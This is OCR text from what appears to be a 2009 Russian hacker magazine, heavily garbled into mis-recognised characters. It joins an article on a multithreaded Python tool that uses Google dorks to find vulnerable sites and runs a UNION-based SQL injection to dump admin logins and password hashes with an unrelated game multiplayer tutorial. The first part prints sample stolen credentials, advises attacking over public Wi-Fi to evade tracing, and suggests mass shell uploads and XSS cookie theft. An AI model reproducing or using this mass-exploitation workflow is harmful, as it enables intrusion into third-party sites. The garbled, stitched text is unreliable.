с!азз=гха ЬгеШ " ( [ л »&] * ) 



Здесь видим, что в квадратных скобкахуказано 
взять все символы, кроме двойных кавычек или 
знака &. После обработки рэгэкспом строка вида: 

. . .<ЪЗ с1азз=гха ЪхеШ "ЫШр : // 
закигЛауЬапд . огд/ ?раде_ 
ІЫ12&ІЫ16" . . . 



- вернется к нам в первом параметре в виде: 
ШрУ/заіигсІаѵЬапд.огд/Іраде ісІ= 1 2 . что нам и 
требуется. 

Используя эти знания, напишем скрипт пар- 
синга (доодіе. ру], который будет складывать ре- 
зультаты в файл (например, доодіе. М). На этом 
скрипте, в силу его простоты, мы останавли- 
ваться не будем, комментированные исходники 
ты сможешь найти во врезке. Я лишьзамечу, 
что там подключен один неизвестныйтебе са- 
мописный модульсигі, размещенный в файле 
сигі.ру. Он представляет собой обвертку над 
русигі. Сигі.ру состоит всего из одной функции, 
которая облегчает использование русигі при 
Оеі-запросах. Эта функция игІ_деІ принимает 
один параметр — ІІНГсайта, а возвращает или 
пустое значение, если запрос не удался, или 
тело ответа. Рассмотрим его более подробно: 

сигі.ру 

# подключаем модули для работы с се- 
тью и для работы со строками 
ішрогб русигі 

ішрогб ЗбгіпдІО 

# в аргументе передаем ІШЬ запроса 
беі иг1_деб (игі) : 

# инициализируем объекты 
баба = ЗбгіпдІО . ЗбгіпдІО ( ) 
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сигі = русигі . Сигі ( ) 
#настраиваем русигі 



1і1е_доод1е = «доодіе . ЦхЦ» 
1і1е_зиссезз = «зиссезз . СхС» 
1і1е_1аі1е<і = «Іаііесі . ЦхЦ» 
тах_соипЦ_Ц]теас1 = 20 



гег = ге . Ііпсіаіі ('::(.*)::', гег ) 
іі ( Іеп (гег ) ==0 ) : 

Іаііесі (игі) 
еізе : 

зиссезз (игі + 1 : 1 + гег [0] ) 
ргіпС ' # ' + игі + 1 ДевСес!' 



сигі . зеСорС ( 

русигі . ЕОЬЬСЖЬОСАТІСЖ , 0 ) 
сигі . зеСорС ( 

русигі . СОШЕСТТІМЕОІІТ ,30) 
сигі . зеЪорС (русигі . ІШІ» , игі) 
сигі . зеЪорС (русигі .ШІТЕЕШСТІОЕГ, 
сІаСа . ѵѵгіСе) 



Сгу : 

# исполняем запрос 
сигі . регіогт ( ) 
ехсерС : 
разз 

сигі . сіозе ( ) 

# возвращаем результат 
геЪигп сІаСа . деСѵаІие ( ) 



Послезапуска написанного скрипта доодіе.ру 
нами будет получен файл доод Іе.іхі со списком 
теоретически уязвимых сайтов, благодаря чему 
мы можем перейти к самому интересному — к 
разработке системы тестирования. 






ш 



в ПРОЕКТИРОВАНИЕ ЗАВОДА 

Скрипттестирования реализуется разными 
способами, но мне бы хотелось сделать ставку 
на универсальность — баги появляются вся- 
кие, и скрипт должен быть достаточно гибким, 
чтобы его можно было бы под них оперативно 
модифицировать. В общем, я решил раз- 
делить все хозяйство на две части. В задачи 
первой (главной] части будет входить откры- 
тие списка сайтов, за пуск функции проверки, 

— а саму функцию проверки мы вынесем в 
отдельный файл ради обеспечения гибко- 
сти. Пусть главный файл будет называться 
аиіоіезіег.ру, а файл с функцией тестирования 

— ѵѵр.ру. 



н РАЗРАБОТКА ѴѴР.РУ 

Модуль ѵѵр.ру состоит из конфига и одной функ- 
ции. В конфиге в переменной тах_соип1;_1:Ьеаб 
мы укажем максимальное количество потоков, 



В б1е_доод1е будут находиться тестируемые 
сайты. В Л1е_5ііссе55 попадетудачный резуль- 
таттестирования, а в бі Іе_ба і ІесІ — неудачный. 

С файлами есть один нюанс. Нам нужно, что- 
бы все потоки могли записывать информа- 
цию в файлы беспрепятственно. Сделать это 
в функции тестирования нельзя, так как она 
будет исполняться в потоке в процессе за- 
писи в файлы из нескольких потоков. Поэтому 
открытие, закрытие и саму запись предстоит 
вынести в главную программу, а функции 
тестирования будутлишь вызывать их. Для 
этого подключим в нашем модуле тестирова- 
ния главную программу, чтобы иметь доступ 
к функциям, которые мы назовем зиссезз и 
ба і ІесІ . Их подключения выполним так: 

Ігош таіп ітрогЪ зиссезз , Іаііесі 

таіп — это специальная переменная, 

которая определяет главный модуль. Теперь, 
к примеру, чтобы записать информацию о 
неудачном взломе, нужно вызвать: 

Іаііесі ( 1 зіСе ' ) 

Сами функции мы разработаем в процессе соз- 
дания главного модуля. Перейдем к разработке 
функции тестирования. Пусть она будет на- 
зываться гип и в качестве аргумента принимать 
игі сайта для тестирования: 

ітрогЪ сигі 
ітрогС ге 
сіеі гип (игі) : 

пеѵ\ц_иг1 = игі + "&ісІ=- 
999+ипіоп+аІІ+зеІесС+І ,2,3,4, 
дгоир_сопсаС ( 0x3 а , 0x3 а , изег_ 

Іодіп, 0x3а , изег_разз , 0x3а, 0x3а) , 
б + 1гот+ѵѵр_изегз-- ' 

гег = сигі .иг1_деС (пеѵѵ_иг1) 



Сначала в ней делается запрос, в котором 
присутствует 501- инъекция. Она вернет нам 
логины и пароли. При выводе результата тот 
обрамляется двоеточием (0x3а) — благодаря 
чему результат мы сможем извлечь простой 
регуляркой. 

Результаты удачного взлома записываются 
в соответствующий файл, а неудачного вы- 
носятся на позорный столб, имя которому — 
Іаііеб.іхі;. 



Ш 
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^многопоточность 

В ядре мы будем использовать много- 
поточность. Для лучшего понимания 
предварительно изучим немного теории. 
Многопоточность в питоне довольно проста 
и реализовать ее можно разными мето- 
дами. Мы рассмотрим только один (мой 
любимый]. Для его использования нужно 
объявить библиотеку «ІИ геасі » через ко- 
манду «ітрогі: іЬгеасІ», а дальше — спокой- 
но запускать абсолютно любую функцию как 
поток командой ІбгеасІ.5І:аг1:_пе\лМЬгеасІ. 
Для демонстрации данного подхода объявим 
простенькую функцию с одной инструкцией 
«разз» (в Руібоп нельзя объявить цикл или 
функцию совсем без инструкций): 

сіеі зоше_1ипсШоп ( ) : 
разз 

Далее запустим эту функцию как поток: 




Щігеасі . зЪагЦ_пеѵѵ_ЦІігеас1 ( 
зоте_1ипсСіоп, () ) 



А поскольку прелесть потоков в их количестве, 
то запустим сразу десять штук: 



Іог і іп хгапде (0,10) : 

Щігеасі . зСагЦ_пеѵѵ_ЦІігеа(1 ( 
зоше_1ипсЦіоп, () ) 
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ЫЕТВЕАЫ5 — УДОБНАЯ СРЕДА ДЛЯ ПРОГРАММИН- 
ГА. В ПОСЛЕДНЕЕ ВРЕМЯ ОНА ПОЛНОСТЬЮ ЗАМЕ- 
НИЛА МНЕ ЕСЫР5Е 




СКРИН ОДНОЙ ИЗ ЖЕРТВ 
ПОСЛЕ ИНЪЕКЦИИ 
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Здесь есть проблема — отсутствует встроенное 
средство, которое бы контролировало выполне- 
ние потоков и их количество при использовании 
модуля ІбгеасІ. Главная программа можетза- 
вершиться, не дожидаясь выполнения потоков! 
Для решения этой проблемы достаточно ввести 
дополнительную переменную, которая будет 
хранить количество активных потоков. Назовем 
ее «соипМбгеаб» и вначале присвоим ей О, 
что будет означать, что количество запущенных 
потоков равно нулю. При каждом запуске потока 
нужноувеличивать наш флаг на 1 : 

іог і іп хгапде ( 0 , зуз . агдѵ [ 3 ] ) : 
соипб_ЫігеасІ += 1 
Щтгеаб . збагб_пем_б]тгеас1 ( 
зоте_іипсбіоп, () ) 

Кроме того, в каждую функцию, которую мы 
планируем запускать как поток, нужно добавить 
изменения, чтобы она при завершении своей 
работы уменьшала флаг потоков на единицу: 

сіеі зоте_іипсбіоп ( ) : 
дІоЬаІ соипб_Ыігеас1 
соипб_ЫігеасІ -= 1 

В конце программы мы напишем бесконечный 
цикл, ждущий завершения всех потоков: 

ѵЛііІе (соипб_Ыіеас1»0 ) : 
разз 

Теперь применим это в нашей программе. 



н РАЗРАБОТКА ЯДРА 

В главной программе первым делом нужно 
подключить функцию тестирования. Пусть 
имя файла с функцией будет храниться в 
переменной: 

іі1е_безб_зібе = 'ѵѵр' 

Если же попробовать вызвать ітроН Я1е_1ез1_ 
зТе.то питон выдаст жалобу на отсутствие та- 
кого модуля. Поэтому подключать нужно через 
специальную функцию следующим образом: 

безб_зібе = ітрогб ( 

іі1е_безб_зібе) 

Благодаря этой строчке, все функции и 
переменные с ѵѵр. ру будут доступны через 
переменную Тез1:_5І1;е в главной программе. 

К примеру, чтобы обратиться к переменной с 
максимальным количеством потоков, объяв- 
ленной в ѵѵр. ру, нужно написать следующее: 

ргіпб ЦезЦ_зіСе . тах_соипЦ_Щтеасі 

Далее по ходу программы нам полагается 
открыть необходимые файлы, имена которых 
определены в файле ѵѵр. ру: 

іі = ореп ( 

безб_зібе . іііе_доод1е , ' г 1 ) 
зібе_1ізб = іі . геасіііпез ( ) 
зібе_1ізб = ипід ( зібе_1ізб) 
і_зиссезз = ореп ( 



безб_зібе . іі1е_зиссезз , ' ѵг ' ) 
Т_:Еаі1есІ = ореп ( 

безб_зібе. ^І1е_^аі1ес3 / ' ѵѵ ' ) 

Здесь все известно, кроме функции ипіц. Она 
написана для борьбы с дублирующимися 
сайтами (если они останутся после парсинга 
Гугла]. Код функции таков: 

сіеП ипід(іпіізб) : 

# объявим пустой список 
гез = [] 

# цикл по всему входному списку 
бог ібет іп іпіізб: 

# если элемента нет в исходящем 
списке 

іі ібет поб іп гег : 

# добавим элемент в результат 
гег . аррепб ( ібет) 
гебшгп гег 

Не забудь также написать функции для 
записи результатов. К примеру, успех мы 
зафиксируем так: 

беб зиссезз (бехб) : 
дІоЬаІ б_зиссезз 
б_зиссезз .шгібе (бехб + "\п") 
б_зиссезз . біизб. ( ) 

Тут мы видим функцию ііизЬ, постоянно сбра- 
сывающую файловый буфер на диск — этот 
маневр спасет намытые данные от внезапного 
завершения программы. Затем идет главный 




ШШ 



ІІШіШІШ 



► 098 



ХАКЕР 05/125/09 











» согііпд 



цикл программы, который читает 5 іІе_ІІ5І и вытягивает от- 
туда по одной записи ШІ_ сайта через метод рор: 

зіСе = зіСе_1ізС . рор ( ) 

Он позволяет работать со списком, каксо стеком —то есть, 
берет самую верхнюю запись и при этомудаляетее из списка. 
Подготовительные работы выполнены и можно запускать 
функцию гип_Іе5І: как поток. А она уже, в свою очередь, вы- 
зовет функциютестирования гип из модуля доодіе.ру: 

беі гип_ЬезР ( зіСе) : 
дІоЬаІ соипк_Ыіеаб 
РезЦ_зіСе . гип (зіСе) 
соипк_Ыіеаб -= 1 

Сам запуск потоков выглядит так: 

#пока есть необработанные сайты 
иМІе ( Іеп ( зібе_1ізб ) " 0 ) : 

# если количество потоков меньше максималь- 
ного числа 

іі (безб_зібе . тах_соипк_Ыіеаб > соипк_Ыіеаб) : 
# взять со списка один сайт 
зібе = зібе_1ізб .рор ( ) 



СКРИПТ 

ПАРСИНГА ГУГЛА 
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I # конфиг парсера 

богк = ' іпигі :раде_іб+"Са11егу+роѵ\гегеб+Ъу+іМ 
оЫод" ' 
раде =10 

гед = ' с1азз=г»«а Ьгеб= " ( [ А " &] * ) ' 

ргіпб " # збагб" 

ргіпб " # богк: " + богк 

ргіпб "# аіі раде: " + збг(раде) 

# открываем файл на запись 
іо = ореп ( ' доодіе . бхб ' , ' ѵг ' ) 
ргіпб " # доодіе. бхб ореп" 






■1 



ітрогб сигі 
ітрогб біше 
ітрогб ге 

# пройтись по раде страницам в Гугле 
бог і іп хгапде ( 0 , раде ) : 

# формирование ШЪ 

иг 1 = "кббр :/ /ѵття. доодіе . сот/ 
зеагсЪ.?д= " +богк+ " &збагб= " + збг(і*10) 

# исполнения запроса 
гег = сигі .иг1_деб (игі) 

# достаем ссылки 

гег = ге . ііпбаіі (гед, гег ) 

# записываем результат в файл 
бог ібет іп гег : 

іо . ѵггііе ( ібет+ " \п" ) 

ргіпб " # раде " + збг ( і + 1 ) + " бопе" 

# ждем 2 сек . 
біте . зіеер (2 ) 

# закрываем файл 
бо . сіозе 

ргіпб ' # аіі бопе' 



соипб_бЬеаб +=1 

# запустить проверку взятого сайта 
бйгеаб. збагб_пеѵ^_бйгеаб (гип_безб , (зібе, ) ) 

# если потоков больше максимального числа, 

# то подождем, пока какой-нибудь освободится 
еізе : 

разз 

Этот код обеспечивает запуск функции тестирования как 
потока для всех сайтов и контролирует, чтобы потоков не 
было больше максимального числа, что указано в перемен- 
ной тах_соипЫ:ЬеасІ, объявленной вѵѵр.ру. Напомню, все 
скрипты с подробными комментариями есть на диске. 

□ЗАЩИТА ОТ «ДРУЗЕЙ» 

Какты наверняка заметил, в примере я не использую прок- 
си, практикуя прямое подключение катакуемым сайтам. 
Конечно, при желании, можно реализовать поддержку сок- 
сов, изменив функцию и гІ_деб, но я предпочитаю поступать 
по-другому. Обычно я стараюсь писать автоматические 
скрипты, нетребующие особого присмотра, и когда все 
готово, просто беру нетбук и выхожу с ним в люди — напри- 
мер, в питейное заведение, где есть вай-фай. Там я испи- 
ваю пиво (через то зело рад становясь], запускаю скрипты, 
спокойно закрываю крышку нетбука и кладу его под стол. 
Никто даже не предполагает, чем я занимаюсь в интерне- 
те. Вай-фай дает вполне приличную скорость, а поскольку 
юзается многопоточность, то затраты времени на работу 
скриптов невелики. Готовый результат я оцениваю уже 
дома, просматривая сохраненные скриптами логи. Тем не 
менее, безопасность никогда не бываетлишней, поэтому 
поддержка соксов приветствуется. 

□ТЕСТИРОВАНИЕ 

Ну что же, нам осталось только протестировать написанный 
код на практике. 

Я последовательно запустил файлы доодіе.ру и аиіоіезіег.ру, 
а после завершения их работы — глянул в файл зиссезз.М, 
который порадовал своим объемом. Вотпервыетри строчки 
из него: 

йббр: //коба***ап. сот/ѵф/ : Іид: $Р$ВІ6Уг5Т()РС>2б 
3 гтМхШі2иЪ2гд2б2А. 

кббр : / /іпбо***е . сот/ : абтіп : $Р$В58 ЦіпеШбСХТоЕ 
БЬ9Ш9те5ХаитгОбО 

кббр : / /ѵллпль баг***ир . сот/ : абтіп : $Р$ВКН1бБІЬгд 
брАОЬОоЗ 8м5Х1ке/АН7 0 . 

Итак, здесь у нас имеет место логин и захешированный 
пароль для доступа в админку. С захешированным паролем 
поможет разобраться последний РаззѵѵогбзРго [ ШрѴ/ѵѵѵѵѵѵ. 
іпзісіерго.сопп/боѵѵпіоаб/раззѵѵогбзрго.гір ). Но доступ к 
админке — не главная цельавтора статьи. В первую очередь 
я хотел показать, как сделать инструмент для быстрого и 
эффективного хака. 

Ведь если, кпримеру.ты возьмешь не ЭОищесбоп, а ис- 
полнение кода, то сможешь быстро изменить функцию гип 
вѵѵр.ру, чтобы она заливала тебе шелл на сервер. Если ты 
найдешьактивнуюХ55,то сможешьлегко ее внедрить на 
все сайты, и потом лишьждать на снифере кукисы. В общем, 
простор для деятельности утебя есть, изучай! Именно 
изучай, но ни в коем случае не используй свои знания во 
вред людям — ты ведь знаешь, чтоЗЕ— не деструктивный 
журнал и все, что мы пишем, служиттолько одной цели — по- 
мочь админам защитить свои сайты от злобных автохакеров. 
Удачи! □С 




НТТР://ѴШѴѴ 

■ ■ 

> Ііпкз 

• Огромнейшая база 
уязвимостей: 
ИДр://тіІѵѵОгт.сот . 

• Бага, заюзанная 

в качестве примера: 

ІіІІр://ппіІѵѵОгт.сопп/ 

ехрІоіІз/8229 . 

• Официальный сайт 
ІЧеіВеапз, удобного 
средства 

для разработки: 
бДрУ/пеІЬеапз.ога . 
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> СІѴСІ 

На диске, кроме 
исходников, ищи 
полноценное видео 
отавтора с демон- 
страцией работы 
скриптов. 
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> ѵѵагпіпд 

Вся информация 
представлена лишь 
в ознакомительных 
целях. Не нужно по- 
вторять глупости за 
автором! 
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ТЕМНОЕ ИСКУССТВО ИГРОДЕЛА, 




Разрабатываем клиент и сервер для многопользовательских 
баталий 

Любая разработка имеетначало и логический конец. Наша про- 
грамма не стала исключением. Пройдя небольшой цикл статей, 
мы стобой создали оченьдаже неплохую игру с поддержкой всех 
современных технологий, реализованных в ОігесіХ (загрузка 
Х-объектов, Зй-графика, звуки в нужных местах, быстрый контроль 
и др.). Но для полноценного гейминга не хватает еще одного компо- 
нента. Конечно же, это мульти плеер. 



н ВЫБИРАЕМ «СКЕЛЕТ» 

Всем прекрасна библиотека Оагк ОИК, 
но в каждой бочке меда есть ложка дегтя. 

Так и с рассматриваемой либой: чтобы с ее 
помощью реализовать мультиплеер, нужно 
не по-детски напрячься. В конце концов, 
мне это надоело (и хорошо, что надоело, 
а то пришлось бы писать кода раза в 4 больше, 
чем сейчас], и я стал искать другие решения. 

И, как ни удивительно, выходбыл найден: 
в виде, по меньшей мере, пары специальных 
протоколов, используемых в разработке много- 
пользовательских игр. Протоколами такие 
вещи можно назвать с большой натяжкой, 
правильнее ихзвать интерфейсами кпротоколу 
0ігес1:РІау, поскольку для обмена сообщениями 
в Оагк 00К (да и, собственно, в ОігесіХ] исполь- 
зуется именно он. Но для простоты будем на- 
зывать их протоколами, таккакони используют 
свои правила для передачи данных с помощью 
ОігесіРІау. 

Первый из этих протоколов — это МиШБупс 
(смотри ЬНрУ/Ьгит.ІЬедатесгеаіогв.сот ]. 
Несмотря на то, что продукт вполне рабо- 
тоспособен и болееудобен в применении, 



чем ОагкООК, мнеон не очень понравился. 
Продолжив поиски, я наткнулся на приме- 
чательную вещицу под названием МікеЫеІ:. 
Испытав этот протокол в демо-приложениях, 
я решил использовать его в игре. МікеЫеІ: 
позволяетлегко создавать клиент-серверные 
приложения: каксерверы.таки клиенты. 
Работая с ним, не надо беспокоиться о со- 
кетах и других сетевых заморочках — просто 
формируем пакет и отправляем. Интересной 
возможностью является одновременная работа 
сразу по двум протоколам: ТСР и ІЮР; для этого 
при соединении ссервером, какна клиенте, так 
и на сервере открываются по два локальных 
порта. Через них и идет последующая пере- 
дача данных. Разработчику не надо грузиться 
с определением открываемых портов, МікеЫеІ: 
возьмет всю работу на себя и сделает ее неза- 
метно для конечного пользователя. 

нМІКЕЫЕТ 

Скачать МікеЫеІ: можно со страницы форума 
сайта компании ТЬе бате Сгеаіогз ( Шр:// 
ІюгитЧЬедатесгеаіюгз.сот ). Последняя 
версия на момент написания статьи — 1.0.6, 
ее-то, собственно, уигетЬо и использовал 



при разработке программ. К слову, Майк — 
автор библиотеки — довольно оперативно все 
обновляет, поэтому не исключено, что, когда ты 
будешь читать этот материал, уже выйдет новая 
версия библы (кури блог Майка на предмет 
обновлений). 

После скачивания и распаковки архива в нем 
обнаружится несколько файлов и каталогов. 
Чтобы установить протокол, найди и запусти 
файл Мікеіпзіаіі. ехе (только обрати внимание, 
что ты ставишь версию для С++:)]. Должно 
появиться окно 005-сеанса следующего вида 
(внимание на рис. 1]. 

Инсталлятор сам определит, куда установле- 
на Ѵ5 и скопируетдва файла, необходимых 
для компиляции приложений, использующих 
МікеЫеІ:. Однако в некоторых случаях он может 
работать неправильно. При появлении глюков 
собственноручно скопируй файл МікеЫеІ:. ІіЬ 
в подпапку ѴС\ІіЬ папки, куда установлена сту- 
дия, и файл тікепеО Ь — в подпапку ѴС\іпсІисІе. 
Чтобы приаттачить установленную библио- 
теку к компилятору, запусти студию (загрузи 
проект, в котором собираешься использовать 
средства МікеЫеІ:] и открой свойства проекта 
(например, Рго]есІ ОагкНоЬоІ: Ргорегбез]. 



► 100 
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В свойствах последовательно разверни спис- 
ки: Сопбдигабоп Ргорегбез Ыпкег, а затем 
щелкни по пункту ІприЕ 
В правой части окна, в строку зависимостей 
(Аббібопаі йерепсіепсіез], добавь названия 
двух библиотек: МікеЫеЕ ІіЬ и ѴѴ52_32.1іЬ (рис. 
2]. Для правильной компиляции проделай 
следующий трюк: оставаясь в свойствах, раз- 
верни списокС/С++, щелкни на пункте Собе 
Оепегабоп, и в правой части, напротив пункта 
Випбте ЫЬгагу, из ниспадающего списка вы- 
бери МиШ-бзгеабеб (/МТ) (рис. 3). Это означает, 
что приложение будет использовать много- 
поточную, но статичную версию библиотеки 
времени исполнения. 

Все настройки произведены! Смело закрываем 
окно свойства и двигаемся дальше. 

^СЕРВЕР 

Наконец, компилятор настроен, и можно пере- 
ходить ксамому приятному вжизни кодера — 
программированию. Сначала мы разработаем 
приложение-сервер. В нашем случае сервер 
будет заниматься только передачей данных, 
то есть принимать данные от одного клиента 
и рассылать их всем остальным. Никаких осо- 
бенных вычислений на его стороне произво- 
диться не будет — всю работу мы возложим 
на клиента. Перечислю, какие данные нужно 
передавать. Во-первых, координаты (каждого] 
клиентского робота и угол поворота. Во-вторых, 
был ли произведен выстрел данным конкрет- 
ным роботом. Другими словами, нам не надо 
передавать координаты каждой ракеты. 
Достаточно лишьузнать, совершил робот вы- 
стрел или нет. Так как все координаты и угол 
поворота для данного робота у всех клиентов 
одинаковы, то и ракета вылетит из определен- 
ных координат (позиции робота] и приземлится 
в одинаковой позиции или поразит одну и туже 
цель (поскольку да иные синхронизированы!]. 
В-третьих, надо передать количество жиз- 
ней (для чего это нужно — разберем позже, 
во время разработки клиента]. И, в-четвертых, 
необходимо передать имя клиента и количе- 
ство фрагов (набранныхубийств]. Эти данные 



понадобятся для ведения сервером статистики, 
позже мы это разберем. Создай в ѴС++ новый 
проект. В качестве шаблона выбери Оагк СЭК 
— Сате. Во все проекты, которые используют 
библиотеку МікеЫеІ, надо добавлятьтакой 
заголовочный файл: < МікеЫеІ:. Ь>. Теперь 
можешь открыть с диска проект сервера 
(автор назвал его ОагкЭегѵег, по аналогии 
с ОагкПоЬоІ:], исследовать по комментариям 
коди начинатьего переписывать. НуауигетЬо 
тем временем расскажеттебе о коде более 
подробно. 

После подключения заголовочных файлов 
идут объявления констант, назначение которых 
ясно по комментариям, и структуры, состоящей 
из двух членов: первый, хранящий имя клиента 
и второй — количество фрагов. Далее следует 
главная функция программы, в ней и проис- 
ходит все действо. Операции, относящиеся 
к настройке и перерисовке экрана, мы рассма- 
тривать не будем (поднимай предыдущие ста- 
тьи]. Первая интересующая нас функция — это 
тпЭеНосаІс четырьмя параметрами. Первый 
параметр — ір-адрес для 1:ср-подключения. 
Если его оставить пустым «» (как в нашем слу- 
чае), то программа сама определитего, это бу- 
дет ір-адрес машины, на которой запущен сер- 
вер. Вторым параметром следует номер порта, 
на котором будет ожидание Іср-подключения. 
Затем идут два параметра, аналогичных приве- 
денному выше описанию, за исключением того, 
что вместо ѣср используется протокол ибр. Не- 
смотря на то, что номера портов явно опреде- 
ляются программистом, после соединения кли- 
ента с сервером МікеЫеІ: определяет их и сам 
(смотри описание МЫ выше). Кслову, функция 
тпЗеіФосаІ при успешной работе возвращает 
единицу, иначе — 0 или -1 . Такая проверка 
выполняется после ее вызова с последующим 
выводом диагностических надписей. 

Итак, в случаеуспеха мы запускаем сервер 
командой тпЗіаНЭегѵег с четырьмя парамет- 
рами: максимальное количество клиентов, 
которые могут подключиться, максимальное 
количество ибр-операций, которые клиент 
может отправить в одном ибр-пакете. Третьим 



параметром определяется способ раздачи при- 
шедших ибр-пакетов. Доступно два способа: 
иОРМООЕ_РЕР_СиЕЫТииОРМООЕ_РЕР_ 
СЕІЕЫТ_РЕР_ОРЕРАТІОЫ. Когда используется 
первый способ, от каждого клиента запомина- 
ется только один пакет, пришедший последним, 
более старые — удаляются. В случае второго 
запоминаются пакеты со всеми операциями 
(а нетолько последние], пришедшие от каж- 
дого клиента. Последний используется, когда 
клиент может отправить несколько разных 
пакетов (с разными операциями], напри- 
мер, какв нашей игре. Последний параметр 
задает количество потоков, используемых 
при получении и передаче данных. Для макси- 
мального быстродействия системы это число 
должно зависеть от количества процессоров, 
установленных на машине, на которой запущен 
сервер. Однако если поставить 0, то МікеЫеІ: 
сам определит количество установленных 
ЦПУ и будет использовать данное число. Это 
прекрасный вариант— можно без изменения ^ 
и перекомпиляции запускать наш сервер 
на разных компьютерах, и везде его произво- 
дительность будет на высшем уровне! В нашей 
программе используется 0. 

Далее по коду идетобъявление нескольких 
переменных нашего структурного типа, затем 
цикл, — в нем члены всех объявленных ранее 
структур обнуляются. Теперь мы, наконец, 
попадаем в главный цикл. В нем постоянно 
проверяются порты для выявления пришедших 
данных. Крометого, в самом начале цикла есть 
задержки. Они нужны, чтобы программа не за- 
висла и смогла обрабатывать другие, отлич- 
ные от проверки портов, процессы. Функция 
тпСІіепУоіпеб прослушиваетпортв целях вы- 
явления вновь подключившегося клиента. Па- 
раметров она не имеет — если возвращаемое 
значение больше нуля, значит, подключился 
новый клиент, и надо отобразить его данные: іб, 

{ср ір, Іср рогТ ибр ір, ибр рогЕ После чего надо 
сообщить новому клиенту об уже подключен- 
ных, это совершается в цикле. Используемая 
здесьфункция тпСІіепЮоппеФеб проверяет, 
подключен или нет клиент, іб которого переда- 
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ИПГІІЬ ГѴАЕЬ 





ВВОДИМ СЕРВЕРА 




ИСПОЛЬЗОВАНИЕ МНОГОПОТОЧНОЙ БИБЛИОТЕКИ 
ВРЕМЕНИ ИСПОЛНЕНИЯ 




ется параметром. В результате она возвращает единицу, если результат 
положительный. Всем подключенным клиентам сообщается о новень- 
ком. Функция тпСІіепіФеіб проверяет, не отключился ли какой-либо 
клиенти, если она возвращаетзначение больше 0, значит, клиент 
ста ким идентификатором (возвращенное значение) недавно отклю- 
чился. Об этом прискорбном событии мы также информируем играющую 
компанию посредством текстового сообщения. Далее идет цикл по всем 
клиентам, в который вложен еще один цикл по всем ибр-операциям 
(в нашей программе их две). И уже в нем происходит изъятие из очере- 



ди данных, и проверка на приход отправленного клиентом пакета. Это 
осуществляется функцией тпРесѵІЮР, у которой два параметра: 1 — іб 
клиента, от которого ожидается пакет, 2 — номер операции. Также функ- 
ция возвращает 1 в случае удачи (получения пакета), 0 — в случае отсут- 
ствия посылки и -1 — при появлении ошибки. Если пакетпришел.то его 
надо распотрошить и отправить полученные данные всем клиентам 
за исключением того, от кого он пришел. Деформируем пакет в том же 
порядке, в котором формировали (смотри код клиента и сервера). Это 
делается с помощью функции тпбеі* (где * —тип данных). После 
де-формирования пакета (сохранения всех данных в переменных), с по- 
мощью функций тпАбб* (где * — тип данных) формируем новый пакет. 
Эти функции в качестве параметра принимаютзначение определенного 
типа данных. Наконец, посредством функции тпЗепбІЮРАЦ отправля- 
ем сформированный пакетвсем клиентам. У неетри параметра: 

1 — сохранять или нет отправленный пакет; 

2 — блокировать или нет команду до тех пор, пока пакет не будет всем 
отослан; 

3 — здесь указывается клиент, который исключается из списка рассылки 
(надоуказатьтого клиента, от которого пришел пакете обрабатываемы- 
ми данными). 

Крометого, в этом цикле в переменную беабсоипі; сохраняется наи- 
большее количество набранных игроком фрагов. После окончания 
цикла переменная проверяется, и, если она больше или равна уста- 
новленномулимиту фрагов, которые необходимо набрать для победы, 
тогда формируется новый ибр- па кет (2-ого типа). В него записываются 
имена и количество набранных каждым клиентом фрагов,— и пакет 
также отправляется всем клиентам для вывода (на их стороне) таблицы 
отчетности по игре (кто, сколько фрагов набрал) — позже обязательно 
рассмотрим. Таким образом, в нашей игре реализована мультиплеерная 
баталия типа Ргее іюг АН — все против всех или каждый за себя. 

в КЛИЕНТ 

Чтобы превратить наш синглплеер в мультиплеер, в его код нужно вне- 
сти очень немного изменений. Тем более, в мультиплеере используется 
тот же движок, что и в одиночной игре. Поэтому уигетЬо решил объеди- 
нить две версии в одну игру (выбирается в меню). По этой же причине 
максимально возможное количество клиентов равно пяти — количеству 
роботов в сингплеере. Изменения касаются только способа управления 
врагами: в однопользовательской игре врагами руководит функция 
искусственного интеллекта, а в многопользовательской — принятые 
данные (отправленные от клиентской части оппонента, если роботом 
управляет геймер). Все сделано для того, чтобы можно было оставить 
движок прежним, добавив только поддержку мультиплеера. 

в ОАРККОВОТ МІЛ.ТІРІ.АѴЕВ 6АМЕ 

Загрузи свою финальную версию синглплеера, потому что именно ее 
мы будем дорабатывать. Крометого, ты можешь за грузить уже готовый 
мультиплеер с диска, чтобы сверять результаты. 
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ВО ВРЕМЯ РАБОТЫ СЕРВЕР ВЫВОДИТ 
ДИАГНОСТИЧЕСКИЕ ДАННЫЕ 



В основном изменениям подверглись четыре файла: Маіп. 
срр, РоЬоЕ срр, РоЬоЕ Ь, 6ате_0Ьф Н (в последних двух 
изменения очень несущественны). Начнем обзор моди- 
фикаций с файла Маіп. срр. Здесь добавилась важная гло- 
бальная переменная датетоб,вней отмечается текущий 
режим игры: 0 — режим не установлен (режим начального 
меню), 1 — синглплеер, 2 — мультиплеер. Пока в нашей игре 
реализован только один многопользовательский режим, 
поэтому, если хочешь еще режимы (например, дуэльный 
или захват флага), то удобнее всего добавить индикатор 
режима в эту переменную. Поэтому, кроме всего прочего, 
автор приготовил для тебя легко расширяемый механизм 
игрового движка. Также добавлены константы для опреде- 
лениятипа Іср и ибр пакетов (о нихты читал выше и можешь 
узнать больше из комментариев кпрограмме) и лимит 
фрагов. 

После запуска игры перед геймером появляется консоль- 
ное меню выбора режима. Почему консольное? Потому 
чтоуигетбо не хотел отходить от начальной задумки (самая 
первая версия — если помнишь, когда выводилась надпись, 
повествующая о загрузке уровня). Ктомуже, ему былолень 
рисовать картинки для фона и кнопокменю (была бы его 
воля, он кроме написания кода вообще ничем бы неза- 
нимался). В этом (и во всех последующих) меню для вы- 
бора нужного пункта надо нажатьуказанную рядом с ним 
клавишу. Первоначальное меню выводит самописная 
функция ЗеІесЮатеТуре. В ней обнуляется переменная 
датетоб, то есть игра переводится в режим меню. Затем 
запускается цикл, который «вращается», пока с помощью 
клавиш не выбран режим игры. Здесь интересна только 



одна функция — это бЬЗсапСобе, которая возвращает номер 
нажатой клавиши. Номера стартуют с единицы, начиная 
с клавиши с буквой «Е». Если выбрать синглплеер, то он 
и загрузится — не будем рассматривать этот путь, поскольку 
все о нем знаем! С другой стороны, если выбрать мультипле- 
ер, то появится новое меню, где предлагается ввести имя 
геймера, которое запоминается в глобальной переменной 
и сохраняется на протяжении всего сеанса игры. За работу 
этого меню ответственна функция ОеШзегЫате. Пустое 
имя ввести нельзя. Когда имя будет введено, появится 
следующая страница меню, где надо будет ввести ір-адрес 
сервера. 

Эту страницу выводит и обслуживает функция такеСоппесЕ 
